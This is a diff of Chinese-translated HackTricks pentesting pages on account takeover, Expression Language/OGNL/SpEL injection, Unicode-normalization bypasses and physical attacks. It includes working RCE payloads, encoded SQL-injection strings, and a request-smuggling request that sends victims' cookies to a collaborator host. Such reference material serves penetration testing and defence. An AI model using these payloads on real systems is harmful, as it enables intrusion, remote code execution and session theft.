4. 查找基于_host header_的密码重置URL例如`https://attacker.com/reset-password.php?token=TOKEN`
### 通过电子邮件参数进行密码重置 <a href="#password-reset-via-email-parameter" id="password-reset-via-email-parameter"></a>
```powershell
# parameter pollution
email=victim@mail.com&email=hacker@mail.com
@ -95,9 +114,9 @@ email=victim@mail.com|hacker@mail.com
```
### API参数上的IDOR <a href="#idor-on-api-parameters" id="idor-on-api-parameters"></a>
1. 攻击者必须使用他们的户登录并转到**更改密码**功能。
1. 攻击者必须使用他们的户登录并转到**更改密码**功能。
2. 启动Burp Suite并拦截请求。
3. 将其发送到重复选项卡并编辑参数用户ID/电子邮件\
3. 将其发送到重复选项卡并编辑参数用户ID/电子邮件\
`powershell POST /api/changepass [...] ("form": {"email":"victim@email.com","password":"securepwd"})`
### 弱密码重置令牌 <a href="#weak-password-reset-token" id="weak-password-reset-token"></a>
@ -124,10 +143,10 @@ email=victim@mail.com|hacker@mail.com
### 通过用户名冲突进行密码重置 <a href="#password-reset-via-username-collision" id="password-reset-via-username-collision"></a>
1. 使用与受害者用户名相同的用户名在系统上注册,但在用户名之前和/或之后插入空格。例如:`"admin "`
2. 使用您恶意用户名请求重置密码。
3. 使用发送到您电子邮件的令牌重置受害者密码。
4. 使用新密码连接到受害者户。
1. 使用与受害者用户名相同但在用户名之前和/或之后插入空格的用户名在系统上注册,例如:`"admin "`
2. 使用您恶意用户名请求重置密码。
3. 使用发送到您电子邮件的令牌重置受害者密码。
4. 使用新密码连接到受害者户。
平台CTFd容易受到此攻击的影响。\
参见:[CVE-2020-7245](https://nvd.nist.gov/vuln/detail/CVE-2020-7245)
@ -136,13 +155,13 @@ email=victim@mail.com|hacker@mail.com
1. 在应用程序内或子域中找到XSS漏洞如果cookie的范围限定为父域`*.domain.com`
2. 泄露当前的**会话cookie**
3. 使用cookie用户进行身份验证
3. 使用cookie作为用户进行身份验证
### 通过HTTP请求走私实现账户接管 <a href="#account-takeover-via-http-request-smuggling" id="account-takeover-via-http-request-smuggling"></a>
1. 使用**smuggler**检测HTTP请求走私的类型CL、TE、CL.TE\
`powershell git clone https://github.com/defparam/smuggler.git cd smuggler python3 smuggler.py -h`\
2. 构造一个请求,该请求用以下数据覆盖`POST / HTTP/1.1`\
2. 构造一个请求,将`POST / HTTP/1.1`覆盖为以下数据\
`GET http://something.burpcollaborator.net HTTP/1.1 X:`目的是将受害者重定向到burpcollab并窃取其cookie\
3. 最终请求可能如下所示
```
@ -156,17 +175,21 @@ Content-Length: 83
GET http://something.burpcollaborator.net HTTP/1.1
X: X
```
### 通过 CSRF 进行账户接管 <a href="#account-takeover-via-csrf" id="account-takeover-via-csrf"></a>
### Hackerone报告利用此漏洞\
* [https://hackerone.com/reports/737140](https://hackerone.com/reports/737140)\
* [https://hackerone.com/reports/771666](https://hackerone.com/reports/771666)
1. 创建 CSRF 的 payload例如“自动提交密码更改的 HTML 表单”
2. 发送 payload
### 通过CSRF接管账户 <a href="#account-takeover-via-csrf" id="account-takeover-via-csrf"></a>
### 通过 JWT 进行账户接管 <a href="#account-takeover-via-jwt" id="account-takeover-via-jwt"></a>
1. 为CSRF创建有效负载例如“自动提交密码更改的HTML表单”
2. 发送有效负载
JSON Web Token 可能用于验证用户身份。
### 通过JWT接管账户 <a href="#account-takeover-via-jwt" id="account-takeover-via-jwt"></a>
* 编辑 JWT更改用户 ID / 电子邮件
* 检查弱 JWT 签名
JSON Web Token可能用于验证用户身份。
* 编辑JWT以更改用户ID/电子邮件
* 检查弱JWT签名
{% content-ref url="hacking-jwt-json-web-tokens.md" %}
[hacking-jwt-json-web-tokens.md](hacking-jwt-json-web-tokens.md)
@ -176,30 +199,28 @@ JSON Web Token 可能用于验证用户身份。
* [https://salmonsec.com/cheatsheet/account\_takeover](https://salmonsec.com/cheatsheet/account\_takeover)
### [WhiteIntel](https://whiteintel.io)
## WhiteIntel
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io)是一个由**暗网**推动的搜索引擎,提供**免费**功能,用于检查公司或其客户是否受到**窃取恶意软件**的影响。
[**WhiteIntel**](https://whiteintel.io) 是一个由 **暗网** 提供支持的搜索引擎,提供 **免费** 功能,用于检查公司或其客户是否受到 **窃取恶意软件** 的影响。
WhiteIntel 的主要目标是打击由信息窃取恶意软件导致的账户接管和勒索软件攻击。
WhiteIntel的主要目标是打击由信息窃取恶意软件导致的账户接管和勒索软件攻击。
您可以访问他们的网站并免费尝试他们的引擎:
{% embed url="https://whiteintel.io" %}
<details>
<summary><strong>从零开始学习 AWS 黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS 红队专家)</strong></a><strong></strong></summary>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS红队专家</strong></a><strong></strong></summary>
支持 HackTricks 的其他方式:
支持HackTricks的其他方式
* 如果您想在 HackTricks 中看到您的 **公司广告****下载 PDF 版本的 HackTricks**,请查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取 [**官方 PEASS & HackTricks 商品**](https://peass.creator-spring.com)
* 探索 [**PEASS 家族**](https://opensea.io/collection/the-peass-family),我们的独家 [**NFTs**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord **](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**。**
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享您的黑客技巧。
* 如果您想在HackTricks中看到您的**公司广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 发现[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFT**](https://opensea.io/collection/the-peass-family)收藏品
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**上关注**我们。
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
</details>

50
pentesting-web/ssti-server-side-template-injection/el-expression-language.md
View file

@ -7,18 +7,18 @@
* 您在**网络安全公司**工作吗? 想要看到您的**公司在HackTricks中做广告** 或者想要访问**PEASS的最新版本或下载PDF格式的HackTricks** 请查看[**订阅计划**](https://github.com/sponsors/carlospolop)
* 发现[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们独家的[NFT收藏品](https://opensea.io/collection/the-peass-family)
* 获取[**官方PEASS和HackTricks周边产品**](https://peass.creator-spring.com)
* **加入** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我的**Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**。**
* **通过向** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **和** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **提交PR来分享您的黑客技巧**
* **加入** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter**上**关注**我 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**。**
* **通过向** [**hacktricks仓库**](https://github.com/carlospolop/hacktricks) **和** [**hacktricks-cloud仓库**](https://github.com/carlospolop/hacktricks-cloud) **提交PR来分享您的黑客技巧**
</details>
## WhiteIntel
### [WhiteIntel](https://whiteintel.io)
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) 是一个由**暗网**支持的搜索引擎,提供免费功能,用于检查公司或其客户是否受到**窃取恶意软件**的**侵害**。
WhiteIntel的主要目标是打击由信息窃取恶意软件导致的账户劫持和勒索软件攻击。
WhiteIntel的主要目标是打击由窃取信息的恶意软件导致的账户劫持和勒索软件攻击。
您可以访问他们的网站并免费尝试他们的引擎:
@ -28,7 +28,7 @@ WhiteIntel的主要目标是打击由信息窃取恶意软件导致的账户劫
## 基本信息
表达式语言EL在JavaEE中是不可或缺的用于桥接表示层(例如,网页)和应用程序逻辑(例如,托管的bean实现它们之间的交互。它主要用于
表达式语言EL在JavaEE中是不可或缺的用于连接表示层(例如网页)和应用程序逻辑(例如托管的bean实现它们之间的交互。它主要用于
- **JavaServer FacesJSF**用于将UI组件绑定到后端数据/操作。
- **JavaServer PagesJSP**用于在JSP页面中访问和操作数据。
@ -37,19 +37,19 @@ WhiteIntel的主要目标是打击由信息窃取恶意软件导致的账户劫
**使用环境**
- **Spring框架**:在各种模块中应用,如安全性和数据。
- **通用用途**通过SpEL API由JVM语言如Java、Kotlin和Scala的开发人员使用。
- **通用用途**开发人员通过SpEL API在基于JVM的语言如Java、Kotlin和Scala使用。
EL存在于JavaEE技术、独立环境中并通过`.jsp`或`.jsf`文件扩展名、堆栈错误以及标题中的“Servlet”等术语来识别。然而其功能和对某些字符的使用可能取决于版本。
{% hint style="info" %}
根据**EL版本**的不同,某些**功能**可能**开启**或**关闭**,通常某些**字符**可能会被**禁止**使用。
根据**EL版本**的不同,某些**功能**可能**开启**或**关闭**,通常某些**字符**可能会被**禁止**使用。
{% endhint %}
## 基本示例
(您可以在[https://pentest-tools.com/blog/exploiting-ognl-injection-in-apache-struts/](https://pentest-tools.com/blog/exploiting-ognl-injection-in-apache-struts/)找到另一个有趣的关于EL的教程)
(您可以在[https://pentest-tools.com/blog/exploiting-ognl-injection-in-apache-struts/](https://pentest-tools.com/blog/exploiting-ognl-injection-in-apache-struts/)找到有关EL的另一个有趣教程)
从[**Maven**](https://mvnrepository.com)存储库下载以下jar文件
从[**Maven**](https://mvnrepository.com)库下载以下jar文件
* `commons-lang3-3.9.jar`
* `spring-core-5.2.1.RELEASE.jar`
@ -147,7 +147,7 @@ https://www.example.url/?vulnerableParameter=${%23_memberAccess%3d%40ognl.OgnlCo
```
### RCE
* RCE基本**解释**
* RCE基本**解释**
```bash
#Check the method getRuntime is there
{"".getClass().forName("java.lang.Runtime").getMethods()[6].toString()}
@ -171,7 +171,7 @@ https://www.example.url/?vulnerableParameter=${%23_memberAccess%3d%40ognl.OgnlCo
```bash
https://www.example.url/?vulnerableParameter=${%23_memberAccess%3d%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS,%23wwww=@java.lang.Runtime@getRuntime(),%23ssss=new%20java.lang.String[3],%23ssss[0]="cmd",%23ssss[1]="%2fC",%23ssss[2]=%23parameters.INJPARAM[0],%23wwww.exec(%23ssss),%23kzxs%3d%40org.apache.struts2.ServletActionContext%40getResponse().getWriter()%2c%23kzxs.print(%23parameters.INJPARAM[0])%2c%23kzxs.close(),1%3f%23xx%3a%23request.toString}&INJPARAM=touch%20/tmp/InjectedFile.txt
```
* **更多的远程命令执行**
* **更多的远程命令执行RCE**
```java
// Common RCE payloads
''.class.forName('java.lang.Runtime').getMethod('getRuntime',null).invoke(null,null).exec(<COMMAND STRING/ARRAY>)
@ -209,11 +209,11 @@ T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec
```
### 检查环境
* `applicationScope` - 全局应用程序变量
* `requestScope` - 请求变量
* `initParam` - 应用程序初始化变量
* `sessionScope` - 会话变量
* `param.X` - 其中X是http参数的名称的参数值
- `applicationScope` - 全局应用程序变量
- `requestScope` - 请求变量
- `initParam` - 应用程序初始化变量
- `sessionScope` - 会话变量
- `param.X` - 参数值,其中 X 是 http 参数的名称
您需要将这些变量转换为字符串,如下所示:
```bash
@ -240,13 +240,13 @@ ${employee.FirstName}
* [https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Template%20Injection/README.md#tools](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Template%20Injection/README.md#tools)
* [https://github.com/marcin33/hacking/blob/master/payloads/spel-injections.txt](https://github.com/marcin33/hacking/blob/master/payloads/spel-injections.txt)
## WhiteIntel
### [WhiteIntel](https://whiteintel.io)
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) 是一个由**暗网**支持的搜索引擎,提供**免费**功能,用于检查公司或其客户是否受到**窃取恶意软件**的**威胁**。
[**WhiteIntel**](https://whiteintel.io) 是一个由**暗网**推动的搜索引擎,提供**免费**功能,用于检查公司或其客户是否受到**窃取恶意软件**的**威胁**。
WhiteIntel的主要目标是打击由窃取信息恶意软件导致的账户劫持和勒索软件攻击。
WhiteIntel的主要目标是打击由信息窃取恶意软件导致的账户劫持和勒索软件攻击。
您可以访问他们的网站并免费尝试他们的引擎:
@ -257,9 +257,9 @@ WhiteIntel的主要目标是打击由窃取信息恶意软件导致的账户劫
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS Red Team Expert</strong></a><strong></strong></summary>
* 您在**网络安全公司**工作吗? 想要在**HackTricks**中看到您的**公司广告** 或者想要访问**PEASS的最新版本或下载PDF格式的HackTricks** 请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 发现[**PEASS Family**](https://opensea.io/collection/the-peass-family),我们的独家[NFTs](https://opensea.io/collection/the-peass-family)收藏品
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* **加入** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter**上关注我 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**。**
* 通过向[**hacktricks repo**](https://github.com/carlospolop/hacktricks)[**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud)提交PR来分享您的黑客技巧。
* 发现[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[NFTs](https://opensea.io/collection/the-peass-family)收藏品
* 获取[**官方PEASSHackTricks周边产品**](https://peass.creator-spring.com)
* **加入**[**💬**](https://emojipedia.org/speech-balloon/) **Discord群组**](https://discord.gg/hRep4RUj7f) 或**电报群组**或在**Twitter**上关注我🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**。**
* 通过向**hacktricks repo**和**hacktricks-cloud repo**提交PR来分享您的黑客技巧。
</details>

58
pentesting-web/unicode-injection/unicode-normalization.md
View file

@ -8,17 +8,17 @@
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们独家[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们独家[**NFTs**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter**上关注我们 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
</details>
## WhiteIntel
### [WhiteIntel](https://whiteintel.io)
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) 是一个由**暗网**支持的搜索引擎,提供免费功能,用于检查公司或其客户是否受到**窃取恶意软件**的**侵害**。
[**WhiteIntel**](https://whiteintel.io)是一个以**暗网**为基础的搜索引擎,提供免费功能,用于检查公司或其客户是否受到**窃取恶意软件**的**侵害**。
WhiteIntel的主要目标是打击由信息窃取恶意软件导致的账户劫持和勒索软件攻击。
@ -35,7 +35,7 @@ WhiteIntel的主要目标是打击由信息窃取恶意软件导致的账户劫
Unicode规范化是一种确保字符的不同二进制表示标准化为相同二进制值的过程。这个过程在处理编程和数据处理中的字符串时至关重要。Unicode标准定义了两种字符等价性
1. **规范等价性**:如果字符在打印或显示时具有相同的外观和含义,则被视为规范等价。
2. **兼容等价性**:一种较弱的等价形式,其中字符可能表示相同的抽象字符,但显示方式可能不同。
2. **兼容等价性**:一种较弱的等价形式,其中字符可能表示相同的抽象字符,但显示方式可能不同。
有**四种Unicode规范化算法**NFC、NFD、NFKC和NFKD。每种算法以不同的方式应用规范和兼容规范化技术。要更深入地了解这些技术您可以在[Unicode.org](https://unicode.org/)上探索这些技术。
@ -45,9 +45,9 @@ Unicode规范化是一种确保字符的不同二进制表示标准化为相同
* **代码点和字符**在Unicode中每个字符或符号都被分配一个称为“代码点”的数值。
* **字节表示**:代码点(或字符)在内存中由一个或多个字节表示。例如,拉丁-1字符在讲英语的国家中很常见使用一个字节表示。然而具有更大字符集的语言需要更多字节来表示。
* **编码**:这个术语指的是字符如何转换为一系列字节。UTF-8是一种常见的编码标准其中ASCII字符使用一个字节表示其他字符最多使用四个字节。
* **编码**:这个术语指的是如何将字符转换为一系列字节。UTF-8是一种流行的编码标准其中ASCII字符使用一个字节表示其他字符最多使用四个字节。
* **处理数据**:处理数据的系统必须了解所使用的编码,以正确地将字节流转换为字符。
* **UTF的变体**除了UTF-8还有其他编码标准如UTF-16使用至少2个字节最多4个和UTF-32所有字符使用4个字节
* **UTF的变体**除了UTF-8还有其他编码标准如UTF-16使用至少2个字节最多4个和UTF-32所有字符使用4个字节
理解这些概念对于有效处理和减轻由Unicode的复杂性及其各种编码方法引起的潜在问题至关重要。
@ -59,33 +59,33 @@ unicodedata.normalize("NFKD","chloe\u0301") == unicodedata.normalize("NFKD", "ch
### 探索
如果您在web应用程序中找到一个被回显的值您可以尝试发送**'KELVIN SIGN' (U+0212A)**,它**规范化为"K"** (您可以发送为`%e2%84%aa`)。**如果回显了一个"K"**,那么可能正在执行某种**Unicode规范化**。
如果您可以在web应用程序中找到一个被回显的值您可以尝试发送**“开尔文符号”U+0212A**,它**规范化为“K”**(您可以将其发送为`%e2%84%aa`)。**如果回显了“K”**,那么可能正在执行某种**Unicode规范化**。
另一个**示例**`%F0%9D%95%83%E2%85%87%F0%9D%99%A4%F0%9D%93%83%E2%85%88%F0%9D%94%B0%F0%9D%94%A5%F0%9D%99%96%F0%9D%93%83` 经过**unicode**后为 `Leonishan`
另一个**示例**`%F0%9D%95%83%E2%85%87%F0%9D%99%A4%F0%9D%93%83%E2%85%88%F0%9D%94%B0%F0%9D%94%A5%F0%9D%99%96%F0%9D%93%83` 经过**unicode**后为`Leonishan`。
## **易受攻击的示例**
### **SQL注入过滤器绕过**
想象一个网页正在使用字符`'`来使用用户输入创建SQL查询。这个网页作为安全措施**删除**用户输入中所有字符`'`的出现,但在**删除**之后和**创建**查询之前,它使用**Unicode**对用户输入进行**规范化**。
想象一个网页正在使用字符`'`来使用用户输入创建SQL查询。这个网页作为安全措施**删除**用户输入中所有出现的字符**`'`**,但在**删除**之后和**创建**查询之前,它使用**Unicode**对用户输入进行**规范化**。
然后,恶意用户可以插入一个等效于`' (0x27)`的不同Unicode字符如`%ef%bc%87`,当输入被规范化时,一个单引号被创建,从而出现**SQL注入漏洞**
然后,恶意用户可以插入一个等效于`' (0x27)`的不同Unicode字符如`%ef%bc%87`,当输入被规范化时,会创建一个单引号,从而出现**SQL注入漏洞**
![https://appcheck-ng.com/unicode-normalization-vulnerabilities-the-special-k-polyglot/](<../../.gitbook/assets/image (699).png>)
**一些有趣的Unicode字符**
* `o` -- %e1%b4%bc
* `r` -- %e1%b4%bf
* `1` -- %c2%b9
* `=` -- %e2%81%bc
* `/` -- %ef%bc%8f
* `-`-- %ef%b9%a3
* `#`-- %ef%b9%9f
* `*`-- %ef%b9%a1
* `'` -- %ef%bc%87
* `"` -- %ef%bc%82
* `|` -- %ef%bd%9c
- `o` -- %e1%b4%bc
- `r` -- %e1%b4%bf
- `1` -- %c2%b9
- `=` -- %e2%81%bc
- `/` -- %ef%bc%8f
- `-`-- %ef%b9%a3
- `#`-- %ef%b9%9f
- `*`-- %ef%b9%a1
- `'` -- %ef%bc%87
- `"` -- %ef%bc%82
- `|` -- %ef%bd%9c
```
' or 1=1-- -
%ef%bc%87+%e1%b4%bc%e1%b4%bf+%c2%b9%e2%81%bc%c2%b9%ef%b9%a3%ef%b9%a3+%ef%b9%a3
@ -105,7 +105,7 @@ unicodedata.normalize("NFKD","chloe\u0301") == unicodedata.normalize("NFKD", "ch
### XSS跨站脚本
您可以使用以下字符之一来欺骗 Web 应用程序并利用 XSS
您可以使用以下字符来欺骗 Web 应用程序并利用 XSS
![https://appcheck-ng.com/unicode-normalization-vulnerabilities-the-special-k-polyglot/](<../../.gitbook/assets/image (312) (2).png>)
@ -115,7 +115,7 @@ unicodedata.normalize("NFKD","chloe\u0301") == unicodedata.normalize("NFKD", "ch
### 模糊正则表达式
当后端**使用正则表达式检查用户输入**时,可能会出现**输入**被**规范化**以用于**正则表达式**,但在**使用**时却**未被规范化**的情况。例如,在开放重定向或 SSRF 中,正则表达式可能会**规范化发送的 URL**,但然后**按原样访问**它。
当后端**使用正则表达式检查用户输入**时,可能会出现**输入**被**规范化**用于**正则表达式**,但**未**用于其**使用**的情况。例如,在开放重定向或 SSRF 中,正则表达式可能会**规范化发送的 URL**,但然后**按原样访问**它。
工具 [**recollapse**](https://github.com/0xacb/recollapse) 允许**生成输入的变体**以对后端进行模糊测试。有关更多信息,请查看**github**和此[**文章**](https://0xacb.com/2022/11/21/recollapse/)。
@ -125,15 +125,15 @@ unicodedata.normalize("NFKD","chloe\u0301") == unicodedata.normalize("NFKD", "ch
* [**https://security.stackexchange.com/questions/48879/why-does-directory-traversal-attack-c0af-work**](https://security.stackexchange.com/questions/48879/why-does-directory-traversal-attack-c0af-work)
* [**https://jlajara.gitlab.io/posts/2020/02/19/Bypass\_WAF\_Unicode.html**](https://jlajara.gitlab.io/posts/2020/02/19/Bypass\_WAF\_Unicode.html)
## WhiteIntel
### [WhiteIntel](https://whiteintel.io)
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) 是一个由暗网推动的搜索引擎,提供免费功能,用于检查公司或其客户是否受到**窃取恶意软件**的**侵害**。
WhiteIntel 的主要目标是打击由信息窃取恶意软件导致的账户接管和勒索软件攻击。
WhiteIntel 的主要目标是打击由信息窃取恶意软件导致的账户劫持和勒索软件攻击。
您可以在以下网址检查他们的网站并免费尝试他们的引擎:
您可以在以下网址检查他们的网站并尝试他们的引擎**免费**
{% embed url="https://whiteintel.io" %}
@ -145,7 +145,7 @@ WhiteIntel 的主要目标是打击由信息窃取恶意软件导致的账户接
* 如果您想在 HackTricks 中看到您的**公司广告**或**下载 PDF 版本的 HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)
* 获取[**官方 PEASS & HackTricks 商品**](https://peass.creator-spring.com)
* 发现[**PEASS 家族**](https://opensea.io/collection/the-peass-family),我们的独家[NFT](https://opensea.io/collection/the-peass-family)收藏品
* 发现[**PEASS 家族**](https://opensea.io/collection/the-peass-family),我们的独家[NFTs](https://opensea.io/collection/the-peass-family)收藏品
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或在**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)** 上关注我们。**
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享您的黑客技巧。

22
physical-attacks/physical-attacks.md
View file

@ -14,11 +14,11 @@
</details>
## WhiteIntel
### [WhiteIntel](https://whiteintel.io)
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) 是一个由**暗网**支持的搜索引擎,提供免费功能,用于检查公司或其客户是否受到**窃取恶意软件**的侵害。
[**WhiteIntel**](https://whiteintel.io)是一个由**暗网**支持的搜索引擎,提供免费功能,用于检查公司或其客户是否受到**窃取恶意软件**的侵害。
WhiteIntel的主要目标是打击由信息窃取恶意软件导致的账户劫持和勒索软件攻击。
@ -30,11 +30,11 @@ WhiteIntel的主要目标是打击由信息窃取恶意软件导致的账户劫
## BIOS密码恢复和系统安全
**重置BIOS**可以通过多种方式实现。大多数主板包括一个**电池**,将其拔约**30分钟**后将重置BIOS设置包括密码。或者可以通过调整主板上的**跳线**连接特定引脚来重置这些设置。
**重置BIOS**可以通过多种方式实现。大多数主板包括一个**电池**,将其拔约**30分钟**后将重置BIOS设置包括密码。或者可以通过调整主板上的**跳线**连接特定引脚来重置这些设置。
在无法进行硬件调整或不切实际的情况下,**软件工具**提供了解决方案。使用像**Kali Linux**这样的发行版从**Live CD/USB**运行系统可以访问工具,如**_killCmos_**和**_CmosPWD_**这些工具可以帮助恢复BIOS密码。
在无法或不实用进行硬件调整的情况下,**软件工具**提供了解决方案。使用像**Kali Linux**这样的发行版从**Live CD/USB**运行系统可以访问工具,如**_killCmos_**和**_CmosPWD_**这些工具可以帮助恢复BIOS密码。
在不知道BIOS密码的情况下连续**三次**输入错误密码通常会导致错误代码。此代码用于类似[https://bios-pw.org](https://bios-pw.org)的网站,以潜在地检索可用密码。
在不知道BIOS密码的情况下连续**三次**输入错误密码通常会导致错误代码。可以将此代码用于类似[https://bios-pw.org](https://bios-pw.org)的网站,以潜在地检索可用密码。
### UEFI安全
@ -44,17 +44,17 @@ WhiteIntel的主要目标是打击由信息窃取恶意软件导致的账户劫
### RAM分析和冷启动攻击
RAM在断电后会短暂保留数据通常为**1到2分钟**。通过应用液氮等冷却物质,可以将此持续时间延长至**10分钟**。在此延长期间,可以使用像**dd.exe**和**volatility**这样的工具创建**内存转储**进行分析。
RAM在断电后会短暂保留数据通常为**1到2分钟**。通过应用液氮等冷却物质,可以将此持续时间延长至**10分钟**。在此延长期间,可以使用工具如**dd.exe**和**volatility**创建**内存转储**进行分析。
### 直接内存访问DMA攻击
**INCEPTION**是一种通过DMA进行物理内存操作的工具兼容接口如**FireWire**和**Thunderbolt**。它允许通过修补内存以接受任何密码来绕过登录程序。但是,它对**Windows 10**系统无效。
### Live CD/USB用于系统访问
### 用于系统访问的Live CD/USB
更改系统二进制文件,如**_sethc.exe_**或**_Utilman.exe_**,使用**_cmd.exe_**的副本可以提供具有系统特权的命令提示符。可以使用诸如**chntpw**之类的工具来编辑Windows安装的**SAM**文件,从而允许更改密码。
**Kon-Boot**是一种工具通过临时修改Windows内核或UEFI可以帮助登录Windows系统而无需知道密码。更多信息请访问[https://www.raymond.cc](https://www.raymond.cc/blog/login-to-windows-administrator-and-linux-root-account-without-knowing-or-changing-current-password/)。
**Kon-Boot**是一种工具通过临时修改Windows内核或UEFI可以帮助登录Windows系统而无需知道密码。更多信息可以在[https://www.raymond.cc](https://www.raymond.cc/blog/login-to-windows-administrator-and-linux-root-account-without-knowing-or-changing-current-password/)找到
### 处理Windows安全功能
@ -66,7 +66,7 @@ RAM在断电后会短暂保留数据通常为**1到2分钟**。通过应用
#### BAD USB设备
像**Rubber Ducky**和**Teensyduino**这样的设备可用作创建**恶意USB**设备的平台,能够在连接到目标计算机时执行预定义的载荷。
类似**Rubber Ducky**和**Teensyduino**的设备可用作创建**恶意USB**设备的平台,能够在连接到目标计算机时执行预定义的载荷。
#### 卷影复制
@ -76,6 +76,6 @@ RAM在断电后会短暂保留数据通常为**1到2分钟**。通过应用
如果在内存转储文件(**MEMORY.DMP**)中找到**恢复密码**则可能可以绕过BitLocker加密。可以利用工具如**Elcomsoft Forensic Disk Decryptor**或**Passware Kit Forensic**来实现此目的。
### 社会工程学用于添加恢复密钥
### 通过社会工程学添加恢复密钥
可以通过社会工程学策略添加新的BitLocker恢复密钥说服用户执行一个命令该命令添加由零组成的新恢复密钥从而简化解密过程。

68
todo/hardware-hacking/uart.md
View file

@ -7,18 +7,18 @@
支持HackTricks的其他方式
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASSHackTricks周边产品**](https://peass.creator-spring.com)
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[NFT](https://opensea.io/collection/the-peass-family)收藏品
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter**上关注我们 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
